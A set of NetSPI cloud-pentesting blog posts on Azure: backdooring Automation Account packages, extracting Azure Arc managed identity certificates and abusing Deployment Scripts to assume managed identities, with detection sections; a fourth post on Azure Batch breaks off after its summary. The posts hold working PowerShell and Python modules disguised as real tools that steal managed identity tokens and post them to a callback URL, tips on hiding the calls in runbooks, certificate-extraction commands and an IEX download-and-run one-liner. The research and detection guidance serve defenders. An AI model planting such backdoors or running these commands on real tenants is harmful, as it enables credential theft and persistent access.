Backdooring Azure Automation Account Packages and Runtime Environments
https://www.netspi.com/blog/technical-blog/cloud-pentesting/backdooring-azure-automation-account-packages-and-runtime-environments/
Tue, 24 Sep 2024
Azure Automation Accounts can allow an attacker to persist in the associated packages that support runbooks. Learn how attackers can maintain access to an Automation Account.

Over the years, the Azure Automation Account service has grown and changed significantly. One of the more recent changes is the introduction of Runtime Environments to replace the more traditional module and package management functionality. Azure Automation Accounts have long been a focus of posts on the NetSPI Blog, but we have not really focused on attacks against the modules or packages that support the accounts. The Automation Account service allows you to specify your own custom modules and packages to use in your runbooks, which can be back-doored to allow an attacker persistent access to the Automation Account.  

Additional Resources: 

Prior to the introduction of Runtime Environments, all of the PowerShell modules and Python packages were managed in the Portal under the “Modules” and “Python packages” menus. At the time of writing, this is still the standard package management option, so you may not have the Runtime Environments preview enabled yet. These menus allow Automation Account admins to add additional functionality to their PowerShell and Python runbook environments. As a point of terminology, we will use the terms “packages” and “modules” interchangeably throughout the rest of the blog. 

TL;DR 

  • Azure Automation Accounts allow custom PowerShell modules and Python packages 
    • PowerShell Gallery modules are also supported 
  • Malicious packages can be uploaded to an Automation Account by attackers 
    • The packages can then be called in runbooks for persistence 
    • We’ve included steps below to replicate the process 
  • We’ve created a tool (Get-AzAutomationCustomModules) to help list custom modules/packages that are used in a subscription

What are Runtime Environments? 

The Runtime Environments feature (currently in preview) allows users to set up custom execution environments for Automation Account Runbooks. This allows users to configure specific packages that can be used for an Automation Account container. This gives greater flexibility for an Automation Account, without creating package bloat on the base containers.

It should be noted that in the new Runtime Environments system, the base “System-generated Runtime environments” cannot be modified in the portal to include additional packages. However, if you switch back to the old experience, you can add packages that will then carry over to the new System-generated environments when you switch to the Runtime Environments feature.  

It’s an interesting quirk, but once the feature becomes standard, it’s unlikely that you will be able to change these base environments. If this does become the standard going forward, an attacker would need to create a new runtime, inject a malicious package into it, and swap the environment over for the target runbook. Alternatively, they could just create a new runbook and assign a new Runtime Environment to it. 

Creating a Malicious Package – PowerShell 

In order to attack the Automation Account, we will need to create a malicious package. Keep in mind that the package name will be very visible in the Runtime Environment menu, so it may make sense to “borrow” a package name from a known package. You could just take an existing package file, modify it, and upload it, but for our proof of concept examples, we will show how to create your own custom packages.  

In both custom package examples, we will create functions that will generate a Managed Identity token for the Automation Account, and exfiltrate the token via HTTP to a callback URL (YOUR_URL_HERE). Overwrite the hardcoded URL in the example files to use this yourself. 

Note that all of the example files are available under the “Misc/Packages” folder in the MicroBurst repository. 

In this PowerShell proof of concept, we’ll borrow the PowerUpSQL name for our module. For starters, we will create a basic PowerShell package. The most basic PowerShell package consists of two files, a psd1 that outlines the module and a psm1 that contains the code.

PowerUpSQL.psd1

@{ 

# Script module or binary module file associated with this manifest. 
RootModule = 'PowerUpSQL.psm1' 

# Version number of this module. 
ModuleVersion = '1.105.0' 

# ID used to uniquely identify this module 
GUID = 'dd1fe106-2226-4869-9363-44469e930a4a' 

# Author of this module 
Author = 'Scott Sutherland' 

# Company or vendor of this module 
CompanyName = 'NetSPI' 

# Copyright statement for this module 
Copyright = '(c) 2024 NetSPI. All rights reserved.' 

# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. 
FunctionsToExport = '*' 

# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. 
CmdletsToExport = '*' 

# Variables to export from this module 
VariablesToExport = '*' 

# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. 
AliasesToExport = '*' 

} 

PowerUpSQL.psm1 

function a { 
param( 
    [string] $callbackURL = "https://YOUR_URL_HERE/" 
    ) 

# Hide the warning output 
$SuppressAzurePowerShellBreakingChangeWarnings = $true 

# Connect as the System-Assigned Managed Identity 
Connect-AzAccount -Identity | Out-Null 

# Get a token 
$token = Get-AzAccessToken | ConvertTo-Json 

# Send the token to the callback URL 
Invoke-RestMethod -Uri $callbackURL -Method Post -Body $token | Out-Null 

} 

Export-ModuleMember -Function a 

In this example, we’ve just named our function “a”, but you can name it whatever you want. A single letter might get overlooked, but using something that looks legitimate (Example: Get-AzAutomationAccountUpdates) may also work better. 

The Automation Account will be looking for a zip file, so zip the two files together and name it after your module. Regardless of what is in the psd1 file, the portal will show the module name as whatever the zip file name was, so keep that in mind.
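As a quick reference, the zip can be created with PowerShell. This is a minimal sketch that assumes the two files above are sitting in your current directory:

# Bundle the manifest and module file into a zip named after the module
Compress-Archive -Path .\PowerUpSQL.psd1, .\PowerUpSQL.psm1 -DestinationPath .\PowerUpSQL.zip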

Creating a Malicious Package – Python 

For the Python package, we will need the following files in a directory: 

your_project/ 
├── your_module/ 
│   ├── __init__.py 
│   └── other_module_files.py 
├── README.md 
├── LICENSE 
├── setup.py 

For our Python proof of concept, we’ll use aws_consoler (another NetSPI tool) as the module target, so our folder will be aws_consoler and the module file will be aws_consoler.py. Please keep in mind that you may have to change specific fields (python_requires) below depending on your use case.

setup.py

import setuptools 

with open("README.md", "r") as fh: 
    long_description = fh.read() 

setuptools.setup( 
    name="aws_consoler", 
    version="1.1.0", 
    author="Ian Williams", 
    author_email="ian.williams@netspi.com", 
    description="A utility to convert your AWS CLI credentials into AWS " 
                "console access.", 
    long_description=long_description, 
    long_description_content_type="text/markdown", 
    packages=setuptools.find_packages(), 
    classifiers=[ 
        'Development Status :: 2 - Pre-Alpha', 
        'Intended Audience :: Developers', 
        'License :: OSI Approved :: BSD License', 
        'Natural Language :: English', 
        'Programming Language :: Python :: 3.8', 
    ], 
    python_requires='>=3.8', 
) 

__init__.py 

Although we’re not using a function for this example, this file needs to try to import any functions that it can from our malicious Python file: 

from .aws_consoler import * 

aws_consoler.py 

import os 
import requests 
import json 

endpoint_url = "https://YOUR_URL_HERE" 
identity_endpoint = os.getenv('IDENTITY_ENDPOINT') 
if not identity_endpoint: 
    raise ValueError("IDENTITY_ENDPOINT environment variable not set.") 

# Fetch the token 
params = { 
    'api-version': '2018-02-01', 
    'resource': 'https://management.azure.com/' 
} 
headers = { 
    'Metadata': 'true' 
} 

try: 
    response = requests.get(identity_endpoint, params=params, headers=headers) 
    response.raise_for_status() 
    token = response.json() 

    # Send the token to the specified endpoint 
    post_headers = { 
        'Content-Type': 'application/json' 
    } 
    data = { 
        'token': token 
    } 

    post_response = requests.post(endpoint_url, headers=post_headers, data=json.dumps(data)) 
    post_response.raise_for_status() 

    #return post_response.json() 
except requests.exceptions.RequestException as e: 
    print(f"An exception occurred: {e}") 

In order to be uploaded to the Python Runtime Environment, we will need to compile these files into a WHL file. This can be done in python with the following command: 

python3 setup.py bdist_wheel 

Uploading a Malicious Package 

Now that we have our zipped/compiled packages, we will first show how the current (old) style of module/package upload works. There are two menus that cover this functionality – Modules and Python packages: 

The upload for both options is very simple. You can use the “Add a module” and “Add a Python Package” buttons in the appropriate menus to start the process. Select your file to upload, select your Runtime version, name the package, and select import. Keep in mind that any packages you upload in the old system will carry over to the new System-generated environments in the Runtime Environments interface. 
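If you would rather skip the portal, the same upload can also be done with the Az PowerShell module. This is a rough sketch that assumes the zipped module is hosted at a URL the Automation service can reach (the resource group, account name, and URL below are placeholders):

# Import the zipped module into the Automation Account from a reachable URL
New-AzAutomationModule -ResourceGroupName "ExampleRG" -AutomationAccountName "ExampleAutomationAccount" -Name "PowerUpSQL" -ContentLinkUri "https://YOUR_URL_HERE/PowerUpSQL.zip"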

If you are working with a Runtime Environment, the process is going to be very similar. At this point, we have two options – Modifying an existing Runtime Environment or creating a new one and assigning runbooks to it.

By modifying an existing Runtime Environment, you will have fewer indicators of your malicious package activities. However, this will not work in cases where the runbooks are using the system-generated environments. It’s not possible to add additional packages to those environments in the current interface, so you would have to create a new environment and move the runbook to it (under the “Update Runtime Environment” menu). Alternatively, you can switch back to the old experience, add your packages to the environment, and switch back.

Using the Packages 

Once we have added our malicious packages to the Automation Account and/or Runtime Environment, we will need to call them in a runbook in order to use them. Since the sample code calls back to a URL with a Managed Identity token, make sure that you have your HTTP listener ready to go. 

For PowerShell runbooks, you can just add a line to call your new function. If you want to be extra sneaky about it, end an existing PowerShell line with a “;” and add your new function after that. If the line is particularly long, there’s a decent chance that it will get overlooked by being at the end of the line. Technically, you could also throw any other PowerShell obfuscation technique at the function name at this point as well. 
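As a hypothetical example of that approach, the backdoored call is simply appended to an otherwise legitimate runbook line:

# Existing runbook logic, with the backdoored "a" function appended after the semicolon
Get-AzVM | Select-Object Name, Location, ResourceGroupName | Export-Csv -Path "vm-inventory.csv" -NoTypeInformation; a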

For the Python runbooks, you will need to import the package (aws_consoler): 

import aws_consoler

If you’ve modified an existing runbook, you can just wait for it to be run. If you created a new runbook, now would be a good time to schedule the runbook (once an hour?) to regularly check in with a token for you. 
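If you go the scheduling route, an hourly schedule can be created and linked with the Az PowerShell module. This is a rough sketch, with placeholder resource group, account, and runbook names:

# Create an hourly schedule and link it to the target runbook
New-AzAutomationSchedule -ResourceGroupName "ExampleRG" -AutomationAccountName "ExampleAutomationAccount" -Name "HourlyCheckIn" -StartTime (Get-Date).AddMinutes(10) -HourInterval 1
Register-AzAutomationScheduledRunbook -ResourceGroupName "ExampleRG" -AutomationAccountName "ExampleAutomationAccount" -RunbookName "ExampleRunbook" -ScheduleName "HourlyCheckIn"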

As a final note for persistence, if you have the ability to write runbooks and packages, you probably have the ability to write webhooks for the runbooks. These are a bit out of scope for this blog, but they are a nice way to generate a persistence mechanism for calling an Automation Account runbook, if you get removed from an environment. 

Detection and Hunting Recommendations 

To help detect any existing malicious packages in your Automation Accounts, you can manually review your current modules and packages for any custom modules in the Azure portal. 

Alternatively, we have written a PowerShell script (Get-AzAutomationCustomModules) that will enumerate all of your Automation Accounts and will output a list of custom packages. This utilizes an authenticated Az PowerShell module connection to make the calls, so make sure to Connect-AzAccount before running the tool. 

The tool usage is pretty simple, just import the module (ipmo Get-AzAutomationCustomModules.ps1) and run the function “Get-AzAutomationCustomModules -verbose”. 

The output is pipeline friendly, so you can pipe it to Export-Csv for further review. Due to how the old package management system worked, you may also see some of the previously updated packages as custom packages. I have an older Automation Account that I was testing the script against and found that the AzureRM, Azure, and AzureAD modules were showing up as custom. I’m not 100% sure how they ended up that way, but I believe these are false positives that you may also run into.
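For example, once the function is imported, the results can be exported for offline review:

# Export the enumerated custom packages for review (the file name is just an example)
Get-AzAutomationCustomModules -Verbose | Export-Csv -Path .\CustomAutomationPackages.csv -NoTypeInformation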

Detection and Hunting Opportunities 

See below for additional detection and hunting opportunities: 

Detection Opportunity #1: Packages added to an Azure Automation Account 
Data Source: Cloud Service 
Detection Strategy: Behavior 
Detection Concept:  
Using Azure Activity Log, detect on when any of the following actions are taken against an Automation Account via Azure Credentials: 

  • Microsoft.Automation/automationAccounts/runbooks/draft/write 
  • Microsoft.Automation/automationAccounts/runbooks/publish/action 
  • Microsoft.Automation/automationAccounts/jobs/write 
  • Microsoft.Automation/automationAccounts/listbuiltinmodules/action 
  • Microsoft.Automation/automationAccounts/powershell72Modules/write  
  • Microsoft.Automation/automationAccounts/runtimeEnvironments/packages/delete 
  • Microsoft.Automation/automationAccounts/runtimeEnvironments/write 

Detection Reasoning: A threat actor can use the package upload function to add packages to the Automation Account. Once added, the malicious packages can be used in a runbook. 
Known Detection Consideration: None 
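As a starting point for hunting on these operations, here is a minimal Az PowerShell sketch that pulls recent Activity Log events and filters them against a few of the actions listed above (it assumes an authenticated session with read access to the Activity Log):

# Look back 7 days for package and Runtime Environment writes against Automation Accounts
$suspectActions = @(
    "Microsoft.Automation/automationAccounts/powershell72Modules/write",
    "Microsoft.Automation/automationAccounts/runtimeEnvironments/write",
    "Microsoft.Automation/automationAccounts/runtimeEnvironments/packages/delete"
)
Get-AzActivityLog -StartTime (Get-Date).AddDays(-7) |
    Where-Object { $suspectActions -contains $_.Authorization.Action } |
    Select-Object EventTimestamp, Caller, ResourceId, @{Name='Action';Expression={$_.Authorization.Action}}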

Hunting Opportunity #1: Automation Account Package File Inspection 
Data Source: Cloud Service Metadata 
Detection Strategy: Signature 
Hunting Concept:  
Using the previously noted PowerShell function (Get-AzAutomationCustomModules), it is possible to review custom packages that have been added to an Automation Account. 
Detection Reasoning:  
Any malicious packages that are added to an Automation Account will show up as custom packages. This script collects all of the custom packages for an Automation Account. 
Known Detection Consideration: None 

Conclusions 

Given other recent supply chain attacks, I don’t think it’s unreasonable to expect a threat actor to attempt to poison packages that are used by Automation Accounts. That said, I have not seen this persistence technique used in the wild, but we have been talking about the idea for a number of years. Now would be a good time to take a quick look at the packages in your Automation Accounts to see if there’s anything unexpected lurking in the containers. 

Extracting Managed Identity Certificates from the Azure Arc Service
https://www.netspi.com/blog/technical-blog/cloud-pentesting/extracting-managed-identity-certificates-from-azure-arc-service/
Mon, 05 Aug 2024
The Azure Arc service is handy for bringing on-prem systems to the cloud, but it includes features that could lead to pivots from on-prem into your Azure environment.

Microsoft initially announced the Azure Arc service in 2019 to bridge the gap between on-prem resources and the Azure cloud. While this service allows Azure administrators to easily integrate on-prem resources with their Azure cloud environment, it also brings along its own set of security concerns. 

TL;DR

  1. Azure Arc uses a System-Assigned Managed Identity to authenticate enrolled systems to Azure
  2. The authentication certificate associated with the Managed Identity is stored on the enrolled system: 
    1. Windows – “C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer” 
    2. Linux – “/var/opt/azcmagent/certs/myCert” 
  3. This certificate can be extracted from the system (by local administrators) and used to authenticate as the Managed Identity away from the resource: 
    1. This authentication lacks important logging details (source IP, etc.) in Entra ID 
    2. This architecture breaks the fundamental model for Managed Identities and their credentials 
    3. Any Azure permissions/role applications for the Managed Identity are then available to the attacker. 
    4. These certificates are not controlled by the resource owner, so if one is compromised, the system needs to be removed from Arc and reenrolled to cycle the certificate. 
  4. We wrote a tool to automate the process of extracting these certificates from Arc systems 

Azure Arc 

The core functionality of the Arc service allows Azure administrators to manage and integrate on-prem resources into the cloud. This includes the ability to run commands on systems, extend SQL access to web applications, and enroll systems from other cloud providers. While all this functionality is useful, the authentication model that’s used to integrate these systems into the Azure Arc service has a fundamental flaw. The authentication for the service utilizes a System-Assigned Managed Identity that stores its credential (a certificate) on the Arc system. These credentials are then available to anyone with local administrator access to the system. 

Certificate Storage 

Depending on the operating system, the credential (a PFX file) will be stored in one of two places: 

  1. Windows – “C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer” 
  2. Linux – “/var/opt/azcmagent/certs/myCert” 

*Note that neither file has a PFX file extension, but both are PFX files that do not have passwords.

Accessing the certificate does require local administrator (or root) permissions, and Microsoft considers this security boundary to be the responsibility of the system owner. Microsoft acknowledges this in their documentation, noting that “The agent automatically applies an access control list to this directory, restricting access to local administrators and the ‘himds’ account.” 
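As a simple illustration, a local administrator on a Windows Arc system can read the certificate directly and convert it to Base64 for exfiltration (the same idea applies to the Linux path noted above):

# Requires local administrator rights on the Arc-enrolled system
$certPath = "C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer"
[Convert]::ToBase64String([IO.File]::ReadAllBytes($certPath))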

It should be noted that the Arc service does not grant any default roles to the associated Managed Identities, but Microsoft’s own documentation does recommend adding roles to them. This is recommended to make it easier for the Arc systems to access Azure resources, like Key Vaults. Since there are no default role applications for the Managed Identities, there is no inherent privilege elevation risk associated with enrolling a system in Arc. That said, we have seen practical usage of Arc in several client environments, and the associated Managed Identities are often getting subscription (or resource) level permissions assigned.

Thanks to the functionality of the Arc platform, any user with “Write” permissions on a “HybridCompute” resource can create “run commands” on the systems that allow for command execution. Utilizing the command execution functionality, an attacker would be able to get the Base64 string of the private certificate and save it off to their attacking system. While the run command feature is not yet available in the Portal, it is possible to queue up commands with both the Az CLI and the Management REST APIs.

Extracting Managed Identity Certificates with MicroBurst 

As attackers, we typically want to automate as many tasks as we can. If we do get “HybridCompute” write permissions, an automated solution will help us gather the Managed Identity credentials as fast as possible. These credentials can then be used for persistence and (potentially) for privilege escalation, depending on the applied roles. 

To make this whole process easier, we have added a script (Get-AzArcCertificates) to the MicroBurst toolkit. Below is an overview of the script and its usage. 

Script Overview: 

  1. Check the Az PowerShell module authentication 
  2. Prompt for a Subscription to use 
  3. Enumerate the available “Microsoft.HybridCompute/machines” resources in the subscription 
  4. Select the systems to attack 
  5. Loop through the selected systems 
    1. Create the Run Command instance for the resource 
    2. Wait for the command to execute 
    3. Write the certificate to a local file with the “AuthenticateAs” script 
    4. Delete the Run Command instance 

Usage – Import the function:

ipmo .\MicroBurst\Az\Get-AzArcCertificates.ps1

Usage – Run the function:

PS C:\MicroBurst> Get-AzArcCertificates -Verbose  
VERBOSE: Logged In as kfosaaen@example.com 
VERBOSE: Enumerating Azure Arc Resources in the "Sample Subscription" Subscription 
VERBOSE: 	1 Azure Arc Resource(s) enumerated in the "Sample Subscription" Subscription 
VERBOSE: 		Starting extraction on the i-001aab1bcba8519b1 system 
VERBOSE: 			The i-001aab1bcba8519b1 system is registered as a Windows system 
VERBOSE: 			Adding the SLTImRxhgyukwjE command to the i-001aab1bcba8519b1 system 
VERBOSE: 				Sleeping 10 seconds to allow the command to execute 
VERBOSE: 			Getting the command results from the i-001aab1bcba8519b1 system 
VERBOSE: 				Sleeping additional 5 seconds to allow the command to execute 
VERBOSE: 			Writing the certificate to C:\MicroBurst\6843069d-5b5b-4618-86ac-0ccc8d6a6476.pfx 
VERBOSE: 				Run .\AuthenticateAs-6843069d-5b5b-4618-86ac-0ccc8d6a6476.ps1 (as a local admin) to import the cert and login as the Managed Identity for the i-001aab1bcba8519b1 system 
VERBOSE: 			Removing the SLTImRxhgyukwjE command from the i-001aab1bcba8519b1 system 
VERBOSE: Azure Arc certificate extraction completed for the "Sample Subscription" Subscription 

As noted in the script output, an “AuthenticateAs-*.ps1” script is generated, along with writing the PFX file to the current directory. In a local admin PowerShell session, this script can then be used to authenticate to the Az PowerShell module as the Managed Identity. 
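For context, the generated script boils down to importing the PFX into a local certificate store and then authenticating with it as the identity’s service principal. A rough sketch of that flow (your generated script may differ, and the GUIDs below are placeholders):

# Import the extracted PFX and authenticate as the Managed Identity's service principal
$cert = Import-PfxCertificate -FilePath .\6843069d-5b5b-4618-86ac-0ccc8d6a6476.pfx -CertStoreLocation Cert:\LocalMachine\My
Connect-AzAccount -ServicePrincipal -Tenant "00000000-0000-0000-0000-000000000000" -ApplicationId "11111111-1111-1111-1111-111111111111" -CertificateThumbprint $cert.Thumbprint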

At this point, we are authenticated as the Managed Identity and can utilize any of the roles/permissions applied to it. Since the normal tokens generated by a Managed Identity have a short lifetime, these certificates grant us significantly longer access to the identity. 

Detection and Hunting Opportunities 

There are several detection and hunting options for this attack. Keep in mind that an attacker may not use this specific tool, and they may just directly authenticate to the Arc system to extract the certificates. 

Detection Opportunity #1: Run command instance used on Azure Arc systems 

Data Source: Command Execution
Detection Strategy: Behavior
Detection Concept: Using Azure Activity Log, detect on when any of the following commands are run on an Arc system via Azure Credentials: 

  • Microsoft.HybridCompute/machines/runCommands/write 
  • Microsoft.HybridCompute/machines/runcommands/read 
  • Microsoft.HybridCompute/machines/extensions/write 

Detection Reasoning: A threat actor can use the run command function to extract the certificate from an Arc system without having existing local access.  

The following commands are used by the Microburst tool: 

  • Windows: gc C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer 
  • Linux: cat /var/opt/azcmagent/certs/myCert 

Known Detection Consideration: None 

Detection Opportunity #2: Command run locally to extract certificate 

Data Source: Process Creation
Detection Strategy: Signature 
Detection Concept: Detect when a process is created with the following command line signatures: 

Windows

gc C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer

Linux

cat /var/opt/azcmagent/certs/myCert

Detection Reasoning: If a threat actor has local access to the Arc system they can extract the Managed Identity certificate using the previously noted commands. 
Known Detection Consideration: While the “get-content” (gc) and “cat” commands are listed as examples, there are other commands that could be run to get access to the file, including using other binaries and protocols (HTTP, FTP, etc.) to exfiltrate the files. 

Detection Opportunity #3:  Managed Identity anomalous activities 

Data Source: Cloud Service 
Detection Strategy: Behavior 
Detection Concept: Look for any Managed Identities that are taking actions similar to what an attacker may do (listing resources, attempting to access unauthorized resources). Alternatively, you can start with expected activities for the Managed Identity (accessing specific resources) and then alert on events outside of that scope.  
Detection Reasoning: Given that the Arc System-Assigned Managed Identity should not be utilized for actions outside of its normal scope, there is potential to catch anomalous login behaviors. 
Known Detection Consideration: None

Hunting Opportunity #1: Azure VM File Inspection 

Data Source: File Creation  
Detection Strategy: Behavior 
Hunting Concept: Look for evidence of run commands on Arc Systems that would indicate this type of activity. 
Windows – The specific commands that were run can be found by investigating the script files in the “C:\Packages\Plugins\microsoft.cplat.core.runcommandhandlerwindows\2.0.9\Downloads” directory. Note that the 2.0.9 denotes the version of the RunCommand extension and may differ on your system.

Linux – The specific commands that were run can be found by investigating the temporary files in the “/var/lib/waagent/microsoft.cplat.core.runcommandhandlerlinux-1.3.7/config/$RUNCOMMANDNAME.0.settings” file, where $RUNCOMMANDNAME is the name of the command. 

The settings file contains the following runtime settings, which include the executed command in the public settings field: 

{"runtimeSettings":[{"handlerSettings":{"protectedSettings":"[Truncated] ","protectedSettingsCertThumbprint":"runcommandhandlerlinux.FRQZhHOsNbwJLil","publicSettings":{"asyncExecution":false,"parameters":[],"source":{"script":"cat /var/opt/azcmagent/certs/myCert"},"timeoutInSeconds":0}}}]}

Detection Reasoning:
When using the run command action on an Arc system, there will be residual files left on the Arc system. 
Known Detection Consideration:
Note that the Windows extension will be removed after the run command instance is removed, so this data may be temporarily available. Additionally, the script files themselves may not be persistent in the directories, or they may get cleaned up by the attacker. 
Managed Identity Sign-in Log Addendum:
As an additional detection note, the logging of Managed Identity authentication will be virtually indistinguishable from the normal usage of the Managed Identity on the resource. Since Microsoft does not expect a Managed Identity credential to be used outside of the Azure resource it is assigned to, an IP address is not logged for the authentication event in Entra ID. 

This issue has been raised with MSRC in the past (See the Function Apps blog), but it was dismissed:

These credentials are not intended to be used externally by customers, so the logs aren't surfaced in customer logs. The fix to this issue is the fix to ensure that these credentials are not exposed.

Conclusions 

The accessibility of the certificates, in both Windows and Linux, was raised as two separate tickets to MSRC on April 23, 2024. Both tickets were dismissed on June 12, 2024 with the justification that this is expected behavior for the service. I also had one last call with MSRC and the Arc team on June 20, 2024 to clarify some final points (lack of logging, credential rotation, persistence) on the tickets. 

While I still don’t know if Managed Identities are the best route to enable authentication to an Entra ID tenant, I understand why the service team chose this option. Since these Arc systems do not actually live in Azure, where they could rely on internal cloud management fabric, they need to have some credentials to authenticate up to the cloud. Storing a key would have all the same problems as the Managed Identity certificates but would lack the ability to regularly rotate credentials that are included in the current configuration. The Managed Identity method of authentication allows the systems to get some form of access to the Azure tenant, but I do have concerns around storing credentials (regardless of the directory level protections) on the system. 

Previous Research 

Experimenting with Azure Arc – Matt Felton
https://journeyofthegeek.com/2021/06/12/experimenting-with-azure-arc/

Azure Deployment Scripts: Assuming User-Assigned Managed Identities
https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-user-assigned-managed-identities-via-deployment-scripts/
Thu, 14 Mar 2024
Learn how to use Deployment Scripts for faster privilege escalation with Azure User-Assigned Managed Identities.

As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker, with the correct permissions in a subscription, can assign these identities to resources that they control, and can get access to the permissions of the identity. 

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities. 

The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post – “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.

TL;DR 

  • Attackers may get access to a role that allows assigning a Managed Identity to a resource 
  • Deployment Scripts allow attackers to attach a User-Assigned Managed Identity 
  • The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container 
  • Depending on the permissions of the Managed Identity, this can be used for privilege escalation 
  • We wrote a tool to automate this process 

What are Deployment Scripts? 

As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.

In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.

Automating the Process

In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

Link to the Script – https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzUADeploymentScript.ps1

This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only return the role assignments that your authenticated user can read. The Invoke-AzUADeploymentScript function will attempt to enumerate all roles assigned to the identities that you have access to, but the identity may still hold roles in Subscriptions (or Management Groups) that you don’t have read permissions on.

Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

  • Enumerate available User-Assigned Managed Identities and their role assignments
  • Select the identity to target
  • Generate the malicious Deployment Script ARM template
  • Create a randomly named Deployment Script with the template
  • Get the output from the Deployment Script
  • Remove the Deployment Script and Resource Group Deployment

Since we don’t have an easy way of determining if your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (Write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

  1. Deploy to the Resource Group containing the target User-Assigned Managed Identity:
Invoke-AzUADeploymentScript -Verbose
  2. Deploy to a different Resource Group in the same Subscription:
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
  3. Deploy to a Resource Group in a different Subscription in the same tenant:
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:

  • Run commands on VMs
  • Create RBAC Role Assignments
  • Dump Key Vaults, Storage Account Keys, etc.

Since the function expects string data as the output from the Deployment Script, make sure that you format the output of your “-Command” parameter so that your command output is returned as a string.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json”

Lastly, if you’re running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your “-Command” parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.

Example:

IEX(New-Object System.Net.WebClient).DownloadString('https://example.com/DeploymentExec.ps1') | Out-String

Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

Operation Name – Description
Microsoft.Resources/deployments/validate/action – Validate Deployment
Microsoft.Resources/deployments/write – Create Deployment
Microsoft.Resources/deploymentScripts/write – Write Deployment Script
Microsoft.Storage/storageAccounts/write – Create/Update Storage Account
Microsoft.Storage/storageAccounts/listKeys/action – List Storage Account Keys
Microsoft.ContainerInstance/containerGroups/write – Create/Update Container Group
Microsoft.Resources/deploymentScripts/delete – Delete Deployment Script
Microsoft.Resources/deployments/delete – Delete Deployment

It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

References:

Extracting Sensitive Information from the Azure Batch Service
https://www.netspi.com/blog/technical-blog/cloud-pentesting/extracting-sensitive-information-from-azure-batch-service/
Wed, 28 Feb 2024
The added power and scalability of Batch Service helps users run workloads significantly faster, but misconfigurations can unintentionally expose sensitive data.

We’ve recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we’ve taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service, that we will cover in this blog. 

TL;DR

  • Azure Batch allows for scalable compute job execution
    • Think large data sets and High Performance Computing (HPC) applications 
  • Attackers with Reader access to Batch can: 
    • Read sensitive data from job outputs 
